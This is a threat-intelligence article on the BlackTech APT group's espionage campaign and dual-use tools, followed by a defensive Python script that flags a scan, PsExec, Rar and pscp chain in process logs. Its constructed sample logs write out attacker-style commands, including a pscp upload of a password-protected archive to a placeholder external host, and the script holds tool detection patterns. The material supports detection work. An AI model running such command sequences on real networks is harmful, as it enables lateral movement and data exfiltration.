BlackTech is the name given to an Advanced Persistent Threat (APT) group. The same group is also tracked under the name Palmerworm. Infosec experts first noticed the activities of this collective back in 2013. Since then, BlackTech has carried out several attack campaigns against targets located in East Asia. The long observation period has allowed security researchers to build a rather detailed picture of BlackTech's attack patterns, preferred malware tools, and most commonly used procedures. At its core, BlackTech's operations are focused on espionage, corporate data mining and information exfiltration. BlackTech is most likely state-sponsored; Taiwanese officials have publicly stated that they believe the group is backed by China.
BlackTech Expands Its Reach
However, the latest campaign attributed to this APT group shows that the hackers may be expanding their range of targets and venturing beyond the previously observed regions. Most of the victims were still located in East Asia: three companies from Taiwan (media, electronics, and finance), an engineering company from Japan, and a construction company from China. This time, however, BlackTech also managed to infiltrate a company in the U.S.
According to the researchers, BlackTech spent a considerable amount of time lurking in the networks of some of its victims: the media company's network was compromised for a year, while the construction and finance companies had their networks infiltrated for several months. By contrast, the hackers spent only a couple of days inside the network of the Japanese engineering company and just several weeks inside the electronics company. The unidentified U.S. victim had its network compromised for six months.
BlackTech Relies on Custom Malware Tools and Dual-Use Programs
As part of the latest campaign, four newly crafted backdoors, named Consock, Waship, Dalwit, and Nomri, were observed in use. Previously, BlackTech had relied on two other custom backdoors, Kivars and Pled. The new batch may be entirely new creations or heavily modified variants of the earlier tools.
To better hide their activity and reduce the need to build purpose-built malware for every task, BlackTech also leans on dual-use tools: legitimate programs that administrators use every day and that therefore blend in with normal activity. In this campaign, four such programs were employed. WinRAR, a widely used archiving tool, can stage stolen data into archives before exfiltration. PuTTY, an SSH client, can provide remote access and move data out of the network. SNScan can scan for additional potential targets within the organization's network. PsExec, a legitimate Microsoft Sysinternals tool, lets an operator execute commands on remote Windows hosts and so supports lateral movement. Because each of these tools is legitimate, its presence alone is not a reliable indicator; defenders should look at who ran it, from where, and in what sequence.
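The practical problem with dual-use tools is that any single execution of WinRAR or PsExec looks benign. What stands out is the chain: a network scan, then remote execution, then an archive being built, then an SSH/SCP client pushing it out, all from one host within a short window. The following is an added example, not code from the original article or from any vendor write-up on BlackTech; it scores process-creation records for exactly that sequence. The log lines are constructed for the example (generic Sysmon/EDR-style JSON; the hostnames, user names, paths and the 203.0.113.10 address are placeholders), and the regexes, the 24-hour window, and the "password-protected archive" heuristic based on rar's -hp/-p switches are assumptions of the example rather than anything the page states.

```python
"""Flag hosts where dual-use tools run as a scan -> lateral -> archive -> transfer chain.

Added example. Field names follow a generic process-creation schema
(ts, host, user, image, cmdline); adapt the keys to your own telemetry.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Stage name -> regex over the image basename. The tool names come from the
# campaign description; the exact filename patterns are assumptions.
STAGES = {
    "scan":     re.compile(r"^snscan\.exe$", re.I),
    "lateral":  re.compile(r"^(psexec(64)?|psexesvc)\.exe$", re.I),
    "archive":  re.compile(r"^(winrar|rar)\.exe$", re.I),
    "transfer": re.compile(r"^(putty|plink|pscp|psftp)\.exe$", re.I),
}

# rar/WinRAR: "-p<pwd>" encrypts file data, "-hp<pwd>" also encrypts headers.
PASSWORD_SWITCH = re.compile(r"(^|\s)-h?p\S+", re.I)

# Constructed sample telemetry (not from a real incident). WS-17 shows the full
# chain; FS-02 is a user archiving a report; WS-09 is an admin whose PsExec and
# PuTTY use are three days apart.
LOG = r"""
{"ts":"2020-09-01T02:10:05","host":"WS-17","user":"CORP\\jdoe","image":"C:\\Users\\jdoe\\AppData\\Local\\Temp\\snscan.exe","cmdline":"snscan.exe -p 445 10.1.2.0/24"}
{"ts":"2020-09-01T02:35:41","host":"WS-17","user":"CORP\\jdoe","image":"C:\\Users\\jdoe\\AppData\\Local\\Temp\\PsExec64.exe","cmdline":"PsExec64.exe \\\\FS-02 -s cmd.exe /c whoami"}
{"ts":"2020-09-01T03:02:12","host":"WS-17","user":"CORP\\jdoe","image":"C:\\Program Files\\WinRAR\\Rar.exe","cmdline":"Rar.exe a -hpQ7v!x -r C:\\Users\\jdoe\\AppData\\Local\\Temp\\1.rar \\\\FS-02\\Finance"}
{"ts":"2020-09-01T03:20:55","host":"WS-17","user":"CORP\\jdoe","image":"C:\\Users\\jdoe\\AppData\\Local\\Temp\\pscp.exe","cmdline":"pscp.exe -P 443 C:\\Users\\jdoe\\AppData\\Local\\Temp\\1.rar user@203.0.113.10:/tmp/"}
{"ts":"2020-09-01T08:00:00","host":"WS-17","user":"CORP\\jdoe","image":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe"}
{"ts":"2020-09-01T11:00:03","host":"FS-02","user":"CORP\\mlee","image":"C:\\Program Files\\WinRAR\\WinRAR.exe","cmdline":"\"C:\\Program Files\\WinRAR\\WinRAR.exe\" C:\\Reports\\Q3.rar"}
{"ts":"2020-09-01T09:00:00","host":"WS-09","user":"CORP\\admin","image":"C:\\Tools\\PsExec.exe","cmdline":"PsExec.exe \\\\WS-17 ipconfig"}
{"ts":"2020-09-04T09:00:00","host":"WS-09","user":"CORP\\admin","image":"C:\\Program Files\\PuTTY\\putty.exe","cmdline":"putty.exe -ssh bastion"}
"""


def classify(image: str, cmdline: str):
    """Return the chain stage a process belongs to, or None if it is not a tool of interest."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1]
    for stage, pattern in STAGES.items():
        if pattern.search(name):
            return stage
    return None


def password_protected(cmdline: str) -> bool:
    """True if a rar/WinRAR command line creates a password-protected archive (-p / -hp)."""
    return bool(PASSWORD_SWITCH.search(cmdline))


def parse_events(text: str):
    """Parse newline-delimited JSON records and keep only those that map to a stage."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        stage = classify(rec["image"], rec.get("cmdline", ""))
        if stage:
            events.append({**rec, "ts": datetime.fromisoformat(rec["ts"]), "stage": stage})
    return events


def find_chains(text: str, window=timedelta(hours=24), min_stages=2):
    """Per host, find the window with the most distinct stages; report hosts with >= min_stages."""
    by_host = defaultdict(list)
    for ev in parse_events(text):
        by_host[ev["host"]].append(ev)
    hits = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        best = []  # first event of each distinct stage inside the densest window
        for i, first in enumerate(evs):
            seen, chosen = [], []
            for ev in evs[i:]:
                if ev["ts"] - first["ts"] > window:
                    break
                if ev["stage"] not in seen:
                    seen.append(ev["stage"])
                    chosen.append(ev)
            if len(chosen) > len(best):
                best = chosen
        if len(best) >= min_stages:
            hits[host] = {
                "stages": [e["stage"] for e in best],
                "users": sorted({e["user"] for e in best}),
                "first_seen": best[0]["ts"].isoformat(),
                "encrypted_archive": any(
                    e["stage"] == "archive" and password_protected(e["cmdline"]) for e in best
                ),
            }
    return hits


if __name__ == "__main__":
    for host, hit in find_chains(LOG).items():
        print(host, hit)
```

Lowering min_stages to 1 turns this into a plain inventory of dual-use tool executions, which is useful for baselining but will list every administrator; the two-stage threshold and the time window are what separate the BlackTech-style chain from routine use. Executables launched from user-writable locations such as a Temp directory, as in the WS-17 records, are a further signal worth adding to the score.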